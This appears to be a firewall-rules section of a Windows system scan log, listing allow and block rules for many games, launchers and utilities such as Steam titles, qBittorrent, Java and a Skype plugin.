FirewallRules: [{FC48877D-B0D2-4999-A759-518EE4DA6DB9}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{0536FA6C-F5D7-4518-9627-EE71C318D991}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{A84BE181-1A74-405C-95D7-D15E270D4E2C}D:\programs\ark server\stff\steamcmd\steamcmd.exe] => (Allow) D:\programs\ark server\stff\steamcmd\steamcmd.exe
FirewallRules: [UDP Query User{C6028DD5-E14A-412A-8944-1C8B2C883722}D:\programs\ark server\stff\steamcmd\steamcmd.exe] => (Allow) D:\programs\ark server\stff\steamcmd\steamcmd.exe
FirewallRules: [TCP Query User{4BFF079C-A16D-4DD7-AC35-F84545783478}C:\program files\nefarius software solutions\scptoolkit\scpserver.exe] => (Allow) C:\program files\nefarius software solutions\scptoolkit\scpserver.exe
FirewallRules: [UDP Query User{F8BB4E75-E20F-4350-8F84-44DA2D14F62C}C:\program files\nefarius software solutions\scptoolkit\scpserver.exe] => (Allow) C:\program files\nefarius software solutions\scptoolkit\scpserver.exe
FirewallRules: [{00D5DB0F-048A-423B-AD71-721F0EA34B51}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Sid Meier's Civilization V\CivilizationV.exe
FirewallRules: [{3C508B30-4EE2-4DFF-BF9F-2EBEA8F81480}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Sid Meier's Civilization V\CivilizationV_DX11.exe
FirewallRules: [{BE35A0D2-2501-4AA3-9F37-18D68DF3F46D}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Sid Meier's Civilization V\CivilizationV.exe
FirewallRules: [{B32938FB-2C2D-4411-A204-3F23BC730FF3}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Sid Meier's Civilization V\CivilizationV_DX11.exe
FirewallRules: [{6817A8C0-C21C-4DD9-9160-84015225ABD3}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{76EA049D-2EE2-4CC3-A028-9F51342A4F6B}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{F4E092E0-C5B7-4B11-BC27-532243321735}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{CD0E1722-5E75-45ED-B6C1-AAB572D6B8C9}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{0BFAF90B-CFFA-4B16-BE1C-6F0F0811CC89}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{38CBA3B1-1085-4868-B28F-FAC87FF91E5B}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{3575AA30-9ABB-4E10-B8ED-44ADA29D7CD4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F6DCFE2F-4A6B-4675-B845-E143DD71F359}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{C48C7FD3-6C41-41CB-92FD-B9C363B02EE6}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands\Binaries\Borderlands.exe
FirewallRules: [{E152B5F7-C0C2-4639-A72D-BA168D1F2CDD}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands\Binaries\Borderlands.exe
FirewallRules: [{8B111CC5-BEE0-44F8-AA51-3A5831768E10}] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe
FirewallRules: [{9D3C7A74-7BEE-43D1-AD51-71D3F97982D9}] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe
FirewallRules: [TCP Query User{DEBEC0ED-8088-495E-96AA-0313D4B27229}F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe
FirewallRules: [UDP Query User{15C2DA05-2E8B-4663-8F33-8ED77B804CFE}F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\civilizationv_dx11.exe
FirewallRules: [{55617A45-E5CE-4E88-8FFE-435E94FEEA56}] => (Allow) C:\Program Files (x86)\Sony\Xperia Companion\XperiaCompanion.exe
FirewallRules: [{FB61E68A-B9ED-454D-A44A-E97D0CC7ABB4}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{64CA212E-02DE-4926-888F-932D5A1658A6}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{1EB9A2B0-32B8-4606-8F5E-990497197793}] => (Allow) D:\Programs\qBittorrent\qbittorrent.exe
FirewallRules: [{9A971ED2-910F-498E-8390-C2A5B037F464}] => (Allow) D:\Programs\qBittorrent\qbittorrent.exe
FirewallRules: [{2F8503B1-F0F9-40F8-9EC6-2E3FAF24DEA5}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\System\Postal2.exe
FirewallRules: [{3BF2D93D-5674-4129-A442-E9CA4FD85D2E}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\System\Postal2.exe
FirewallRules: [{B717B23B-3051-464E-B1A0-215065A4C435}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\ShareThePain\System\Postal2MP.exe
FirewallRules: [{1C54E52B-BE44-41D0-BBD6-0A0DB8BDCACA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\ShareThePain\System\Postal2MP.exe
FirewallRules: [{F6A9BA8B-3B79-4D7C-8452-8776EA1BB5DA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\Paradise Lost\System\ParadiseLost.exe
FirewallRules: [{DDD60C21-A290-4323-B9C0-784644379B0A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\POSTAL2Complete\Paradise Lost\System\ParadiseLost.exe
FirewallRules: [{CD3F9234-9969-4F4C-9E9F-89D1C9B6A9B1}] => (Allow) F:\Games\SteamLibrary\steamapps\common\GodMode\bin\GodMode.exe
FirewallRules: [{3D231E09-B2A9-4153-A1AC-78C9DADDAA20}] => (Allow) F:\Games\SteamLibrary\steamapps\common\GodMode\bin\GodMode.exe
FirewallRules: [{7B5D1A10-552F-402D-80B9-3095384A565A}] => (Allow) F:\Program Files (x86)\Origin Games\Mass Effect 2\Binaries\MassEffect2.exe
FirewallRules: [{047C63FA-8863-4B8F-92BD-D23A28E05CC6}] => (Allow) F:\Program Files (x86)\Origin Games\Mass Effect 2\Binaries\MassEffect2.exe
FirewallRules: [TCP Query User{CEBE6347-DAC3-4066-886E-5F370A9C18F5}C:\program files (x86)\pc remote\pc remote\pcremote.exe] => (Allow) C:\program files (x86)\pc remote\pc remote\pcremote.exe
FirewallRules: [UDP Query User{2A2191F0-06F4-43A1-9C08-3CAEE0718E8C}C:\program files (x86)\pc remote\pc remote\pcremote.exe] => (Allow) C:\program files (x86)\pc remote\pc remote\pcremote.exe
FirewallRules: [{A8AD7DC0-805E-4626-AE38-D6C5B4AFB73D}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout Shelter\FalloutShelter.exe
FirewallRules: [{FC0B0A49-E0E9-4BE3-90D3-82CA9733F90E}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout Shelter\FalloutShelter.exe
FirewallRules: [{EEC8CDB4-1A90-4EE4-99F4-E717C762A9A6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C647E6AF-81E7-4D32-A057-1D0C52BB4E3B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{745D3D0C-F814-4A45-867D-2735BF2607DF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\NewZ\NewZLauncher.exe
FirewallRules: [{80AEF1F6-D1D8-4E27-82BF-70CB5DD0ED46}] => (Allow) F:\Games\SteamLibrary\steamapps\common\NewZ\NewZLauncher.exe
FirewallRules: [TCP Query User{EE928019-B6A5-4384-819A-7427A2D5B6A1}F:\games\steamlibrary\steamapps\common\newz\thenewz.exe] => (Allow) F:\games\steamlibrary\steamapps\common\newz\thenewz.exe
FirewallRules: [UDP Query User{A97EBDCE-31BD-4AC6-8130-8A8C22E13985}F:\games\steamlibrary\steamapps\common\newz\thenewz.exe] => (Allow) F:\games\steamlibrary\steamapps\common\newz\thenewz.exe
FirewallRules: [{EA036D3A-0F9D-49E4-83C1-1926D68003EA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\TheEvilWithin\EvilWithin.exe
FirewallRules: [{F539408E-8B01-42AC-9CAB-23DEC828C86A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\TheEvilWithin\EvilWithin.exe
FirewallRules: [{15248D59-4E91-4D82-98ED-4F3B874089C2}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Subnautica\Subnautica.exe
FirewallRules: [{7C0390B7-0362-4D4A-AB88-1648E24ABB4E}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Subnautica\Subnautica.exe
FirewallRules: [{85596A95-48A7-42C4-AB3E-49A4D6DC3994}] => (Allow) F:\Games\SteamLibrary\steamapps\common\STALKER Shadow of Chernobyl\bin\XR_3DA.exe
FirewallRules: [{787D58BB-3074-417F-A3EC-F620ADA57304}] => (Allow) F:\Games\SteamLibrary\steamapps\common\STALKER Shadow of Chernobyl\bin\XR_3DA.exe
FirewallRules: [{9665A8ED-598C-476F-A3BA-A7E6A9AD9731}] => (Allow) F:\Games\SteamLibrary\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe
FirewallRules: [{3C536DE5-E2E4-433D-906B-D8F3E7E73FD2}] => (Allow) F:\Games\SteamLibrary\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe
FirewallRules: [TCP Query User{EFAF80F5-11C3-4AC4-B4EE-4BCD4598F6AC}F:\games\steamlibrary\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Allow) F:\games\steamlibrary\steamapps\common\h1z1 king of the kill\h1z1.exe
FirewallRules: [UDP Query User{1C99FA29-2B8D-4A15-B728-7CBBA6895B58}F:\games\steamlibrary\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Allow) F:\games\steamlibrary\steamapps\common\h1z1 king of the kill\h1z1.exe
FirewallRules: [{C6ABF93A-208A-460B-BFCF-D4AAF79D3E28}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Darksiders II Deathinitive Edition\Darksiders2.exe
FirewallRules: [{2A8048D4-7EDC-44E4-B616-F21C706B7989}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Darksiders II Deathinitive Edition\Darksiders2.exe
FirewallRules: [{5C1D1740-5233-44F5-AFA7-F56C7E738E4E}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Darksiders Warmastered Edition\darksiders1.exe
FirewallRules: [{24E0015A-05B2-4D0F-AE05-674F04B6E96C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Darksiders Warmastered Edition\darksiders1.exe
FirewallRules: [{025DA520-8003-4BFA-9F0B-9104145FB8CD}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\System\witcher.exe
FirewallRules: [{3E02B0C6-F7DF-4C8C-A84C-3BF023B0D28C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\System\witcher.exe
FirewallRules: [{16878F97-12BB-4EC8-992E-5CA56990EAD3}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\System\djinni!.exe
FirewallRules: [{D9C69A97-E017-4601-A9CB-3A06E2CF2C15}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\System\djinni!.exe
FirewallRules: [{D95156A7-FB19-4C03-A1FA-9F2191B9B201}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\Digital Comic\DigitalComic.exe
FirewallRules: [{10024D50-A026-403A-ACE9-D5E3A9BC8CC8}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher Enhanced Edition\Digital Comic\DigitalComic.exe
FirewallRules: [{E7A0D9BA-B90E-4940-81BD-8BAF5D327156}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout\FalloutLauncher.exe
FirewallRules: [{2B8C8707-BB6E-4E31-91C1-D842B652B037}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout\FalloutLauncher.exe
FirewallRules: [{5D942906-26CC-40BC-9216-2D62726B2BAF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout 2\Fallout2Launcher.exe
FirewallRules: [{49571136-B190-47BD-84DC-1C2140DDAC67}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout 2\Fallout2Launcher.exe
FirewallRules: [{22C94A03-1654-42C3-91E6-7FB068C0E76B}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout 3 goty\FalloutLauncher.exe
FirewallRules: [{A34D45F3-89EE-4637-B1AA-9C851281BCEE}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout 3 goty\FalloutLauncher.exe
FirewallRules: [{C6561AA8-55FB-46C3-A5A3-85A705A75137}] => (Allow) F:\Games\SteamLibrary\steamapps\common\STALKER Clear Sky\bin\xrEngine.exe
FirewallRules: [{8E4CEC95-6D6E-4D48-8152-5C471D9F413C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\STALKER Clear Sky\bin\xrEngine.exe
FirewallRules: [{7704A97B-8EF6-4695-9CB8-FF4DC082D5DF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{1AD80FDD-84A5-459D-B509-668DF680435A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{6C0E892F-03D5-4186-9F86-B4A1943BCD84}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Stalker Call of Pripyat\bin\xrEngine.exe
FirewallRules: [{FAA4BCC9-EDC7-4319-B028-7DB2BC6172E2}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Stalker Call of Pripyat\bin\xrEngine.exe
FirewallRules: [{765ECDBE-1A5A-4B69-A976-43403DFBF19A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Mad Max\MadMax.exe
FirewallRules: [{AE52188A-E7BD-41A1-8393-AFC03B83A050}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Mad Max\MadMax.exe
FirewallRules: [{D7932B6B-B02E-4482-AC2F-55CBCCF99CE3}] => (Allow) F:\Games\SteamLibrary\steamapps\common\SleepingDogsDefinitiveEdition\sdhdship.exe
FirewallRules: [{1A536A82-E3A1-48D3-8BF7-1D0C7A4AC320}] => (Allow) F:\Games\SteamLibrary\steamapps\common\SleepingDogsDefinitiveEdition\sdhdship.exe
FirewallRules: [{455B43AA-ED12-465F-94C9-623AB8D4B422}] => (Allow) F:\Games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe
FirewallRules: [{DE53AB56-F3EC-4E32-A670-9B46A1CC1CA0}] => (Allow) F:\Games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe
FirewallRules: [{2183BEBC-4A02-4E48-B2FF-7D5DB0CB56E2}] => (Allow) F:\Games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{E69193B8-7C7A-41E5-8B3A-5A6FD2B1156A}] => (Allow) F:\Games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{A6CC254F-C003-4EE1-8AB3-F759AC82A21C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\NieRAutomata\NieRAutomata.exe
FirewallRules: [{CCA8257E-D593-4E35-91C7-11F29AD3F2E8}] => (Allow) F:\Games\SteamLibrary\steamapps\common\NieRAutomata\NieRAutomata.exe
FirewallRules: [{7DC0E4BA-9A3D-45D7-A483-DF4E783FE4CF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Elder Scrolls Legends\The Elder Scrolls Legends.exe
FirewallRules: [{703AC66F-2071-49A8-A8C8-C5651A6E1DF7}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Elder Scrolls Legends\The Elder Scrolls Legends.exe
FirewallRules: [{E52F6BF7-DC3C-4AE7-AE31-3F6A7508694E}] => (Allow) F:\Games\SteamLibrary\steamapps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{1E12EA9B-1ED5-437F-8142-3E4CC805A1B0}] => (Allow) F:\Games\SteamLibrary\steamapps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{4D297B8F-7445-4750-9423-BA7C1AFC7BDE}] => (Allow) F:\Games\SteamLibrary\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{1AE489AB-F47B-461B-85B5-89210470FA03}] => (Allow) F:\Games\SteamLibrary\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe
FirewallRules: [{5181C2ED-F03C-47AC-9957-CCEB351D1F0F}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{BC9724B9-1B94-464C-900F-2E29BB8EDDD1}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{EFF5F247-C02F-482C-A023-F6D996ECBE04}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{1BA97A77-0CEA-48C0-8260-E9618EDF2F96}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [TCP Query User{02DC4F45-70AE-4001-B508-FCF40D313A60}F:\games\steamlibrary\steamapps\common\sid meier's civilization v\launcher.exe] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\launcher.exe
FirewallRules: [UDP Query User{B39AFC56-51A6-490C-8165-9FE7478B47A1}F:\games\steamlibrary\steamapps\common\sid meier's civilization v\launcher.exe] => (Allow) F:\games\steamlibrary\steamapps\common\sid meier's civilization v\launcher.exe
FirewallRules: [TCP Query User{78C01DCE-D7BE-4083-9390-7A1F425D4204}F:\games\steamlibrary\steamapps\common\darkestdungeon\_windowsnosteam\darkest.exe] => (Allow) F:\games\steamlibrary\steamapps\common\darkestdungeon\_windowsnosteam\darkest.exe
FirewallRules: [UDP Query User{983CAD0A-6816-482B-AA2E-AA851B5BAF93}F:\games\steamlibrary\steamapps\common\darkestdungeon\_windowsnosteam\darkest.exe] => (Allow) F:\games\steamlibrary\steamapps\common\darkestdungeon\_windowsnosteam\darkest.exe
FirewallRules: [TCP Query User{95A6A7A0-0F8B-42C5-A4FD-C0448E7F56B4}F:\programs\jdownloader\jdownloader2.exe] => (Allow) F:\programs\jdownloader\jdownloader2.exe
FirewallRules: [UDP Query User{44201E29-AD28-4D31-B03E-5ACCE31FEEE5}F:\programs\jdownloader\jdownloader2.exe] => (Allow) F:\programs\jdownloader\jdownloader2.exe
FirewallRules: [{031F5188-5835-469B-9CA6-BDD04AB6ED63}] => (Allow) LPort=11155
FirewallRules: [{138D2E15-D8D2-4830-A983-91D338FD83B8}] => (Allow) LPort=11155
FirewallRules: [TCP Query User{B4C2E639-9A2E-4ED4-9B3E-52FFC01441A6}F:\games\steamlibrary\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) F:\games\steamlibrary\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{A031AF72-A066-4832-A4C4-C562F5ADBCF4}F:\games\steamlibrary\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) F:\games\steamlibrary\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{5DD8263F-1D88-4A1A-B97F-E6FF678EDD1F}] => (Allow) F:\Games\SteamLibrary\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [{AC61160C-630D-4569-A484-080350353C20}] => (Allow) F:\Games\SteamLibrary\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [{C3715C64-4057-4447-AE51-708141782230}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher 3\bin\x64\witcher3.exe
FirewallRules: [{FDB104D6-6B9B-43A4-A120-31CD1A6B6D28}] => (Allow) F:\Games\SteamLibrary\steamapps\common\The Witcher 3\bin\x64\witcher3.exe
FirewallRules: [{4A9F13A2-E3A8-485B-A3E6-0A323ED5D4F6}] => (Allow) F:\Games\SteamLibrary\steamapps\common\wallpaper_engine\launcher.exe
FirewallRules: [{439D97E4-90CD-490A-8370-3598428F5483}] => (Allow) F:\Games\SteamLibrary\steamapps\common\wallpaper_engine\launcher.exe
FirewallRules: [{33B63657-ACBF-4D74-BDA0-26281623E54C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\H1Z1\LaunchPad.exe
FirewallRules: [{78798D76-ABB7-47F0-903C-D2BD68D9B581}] => (Allow) F:\Games\SteamLibrary\steamapps\common\H1Z1\LaunchPad.exe
FirewallRules: [TCP Query User{4997044F-7EC0-4E62-8EAF-B3A93E9A6B87}D:\programs\qbittorrent\qbittorrent.exe] => (Allow) D:\programs\qbittorrent\qbittorrent.exe
FirewallRules: [UDP Query User{39623C73-58B3-4C6B-A844-9C254FCDC54C}D:\programs\qbittorrent\qbittorrent.exe] => (Allow) D:\programs\qbittorrent\qbittorrent.exe
FirewallRules: [{E204925D-468E-4543-9C46-31D6E2A42D30}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Shadow Warrior\dx11\launcher.exe
FirewallRules: [{1497FF98-0A01-4807-B005-89ABA6E86635}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Shadow Warrior\dx11\launcher.exe
FirewallRules: [{90F79D59-8E0C-41F4-AC7A-5BF8FD467A81}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{C72B5A78-29C8-4304-B290-755D876814BA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [TCP Query User{FAAB7574-DAD6-4D8B-920E-933E2595285C}F:\programs\vlc\vlc.exe] => (Block) F:\programs\vlc\vlc.exe
FirewallRules: [UDP Query User{1E1D6BCD-5724-4006-91C0-60BE009CB41F}F:\programs\vlc\vlc.exe] => (Block) F:\programs\vlc\vlc.exe
FirewallRules: [{39184E4A-A70F-4EA8-9F5D-5EE7465AAF77}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DOOM\DOOMx64.exe
FirewallRules: [{1F2921E8-A450-4D61-8A05-1D9C58B2963B}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DOOM\DOOMx64.exe
FirewallRules: [{5527349A-5450-456C-B9C3-224714F3BA42}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dead Space\Dead Space.exe
FirewallRules: [{8CBFCD4E-919E-4A59-B322-EE2A6806A153}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dead Space\Dead Space.exe
FirewallRules: [{E3FEF137-B031-48A5-9E21-A0ABF90361E1}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Deus Ex\System\DeusEx.exe
FirewallRules: [{CD7884B1-6EF0-4785-9BAB-B359DE4630FA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Deus Ex\System\DeusEx.exe
FirewallRules: [{39286275-10A2-4B81-9F46-58AF1FBA97DF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Deus Ex Human Revolution Director's Cut\DXHRDC.exe
FirewallRules: [{C59D0976-9C4C-4835-8E16-4D4580B89060}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Deus Ex Human Revolution Director's Cut\DXHRDC.exe
FirewallRules: [{5C7E0383-3AF3-4B1A-80E7-A6A81347CA35}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dead Space 2\deadspace2.exe
FirewallRules: [{D5FD362E-D400-4C3F-99EA-7F27937BF7C8}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Dead Space 2\deadspace2.exe
FirewallRules: [{D822C85C-3702-4207-AED3-E86F65CF7EF0}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Cryptic Studios\Neverwinter.exe
FirewallRules: [{10D84C9F-1C7D-46C0-A1C4-ED001313B430}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Cryptic Studios\Neverwinter.exe
FirewallRules: [{DBE37F76-058E-452A-9FF9-19B649AFC2C5}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Metro 2033 Redux\metro.exe
FirewallRules: [{58F9B0D5-5568-4992-B403-176F4BA1825C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Metro 2033 Redux\metro.exe
FirewallRules: [{40F04ADD-AFFC-45AC-977F-9F541A0EFFBF}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Metro Last Light Redux\metro.exe
FirewallRules: [{D461C694-C414-437B-950F-D17FE6B28238}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Metro Last Light Redux\metro.exe
FirewallRules: [{CC196791-0C3E-4119-873E-939203000209}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{9F723490-2612-4439-BDD5-50CFCF0E7A37}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{CFE49AA4-DE7A-42DF-8990-9A4170A17345}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{0BEA7189-4A91-452A-B862-083502CA990C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{FD597A10-EAE7-4AC6-A8A6-E5D8AC7C2F4F}] => (Allow) F:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{9F0B6A52-3888-4E1E-B1E7-D5F2A65BCA0B}] => (Allow) F:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{AAEE3547-3FA3-4CC1-8686-2F4A2B977191}] => (Allow) F:\Games\SteamLibrary\steamapps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{D9D0F0CF-E06D-4754-BCCB-FE421D0AEC8F}] => (Allow) F:\Games\SteamLibrary\steamapps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{4233752D-14AA-42FA-B2E3-D3E45F409670}] => (Allow) C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe
FirewallRules: [{CCED513B-60CA-4A86-91B7-67C53CC8106D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{083161D9-D5A6-4091-BBFF-ED0BDE51F015}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [TCP Query User{7CF32632-5947-4A2A-B309-0644376DEEB9}C:\programdata\oracle\java\javapath_target_702566\java.exe] => (Allow) C:\programdata\oracle\java\javapath_target_702566\java.exe
FirewallRules: [UDP Query User{4FCFFB0A-442C-4E79-9DC4-138966598842}C:\programdata\oracle\java\javapath_target_702566\java.exe] => (Allow) C:\programdata\oracle\java\javapath_target_702566\java.exe
FirewallRules: [TCP Query User{03E8A54A-289B-4DFB-9F57-72C1F5E4B0DD}C:\program files\java\jre1.8.0_144\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_144\bin\javaw.exe
FirewallRules: [UDP Query User{EEA760C7-FDCA-4018-AE61-D6E59C5423BC}C:\program files\java\jre1.8.0_144\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_144\bin\javaw.exe
FirewallRules: [TCP Query User{BB69F2CC-A771-465F-A6CE-078181DDD1BF}F:\games\steamlibrary\steamapps\common\metro last light redux\metro_benchmark.exe] => (Block) F:\games\steamlibrary\steamapps\common\metro last light redux\metro_benchmark.exe
FirewallRules: [UDP Query User{E285FEA0-8338-4837-8C67-DE4302F94917}F:\games\steamlibrary\steamapps\common\metro last light redux\metro_benchmark.exe] => (Block) F:\games\steamlibrary\steamapps\common\metro last light redux\metro_benchmark.exe
FirewallRules: [{909EF1F0-C846-4912-BD48-E9394C2D1E9F}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Assassin's Creed Unity\ACU.exe
FirewallRules: [{5C5A3231-44E4-4BC0-B867-414638563140}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Assassin's Creed Unity\ACU.exe
FirewallRules: [TCP Query User{41FBDD39-5C60-4BBD-9E8B-99270A95BB8A}C:\users\sblck\appdata\local\skypeplugin\pluginhost.exe] => (Allow) C:\users\sblck\appdata\local\skypeplugin\pluginhost.exe
FirewallRules: [UDP Query User{7415BC39-8B02-4E87-B3E1-B41F5C5A9BDC}C:\users\sblck\appdata\local\skypeplugin\pluginhost.exe] => (Allow) C:\users\sblck\appdata\local\skypeplugin\pluginhost.exe
FirewallRules: [{06FA0781-21B8-4F5F-BA9E-83D70E543B4F}] => (Allow) C:\Program Files\Nexus Mod Manager\NexusClient.exe
FirewallRules: [{FEFD41B7-1BCC-421E-892B-EE3F26023CFF}] => (Allow) C:\Program Files\Nexus Mod Manager\NexusClient.exe
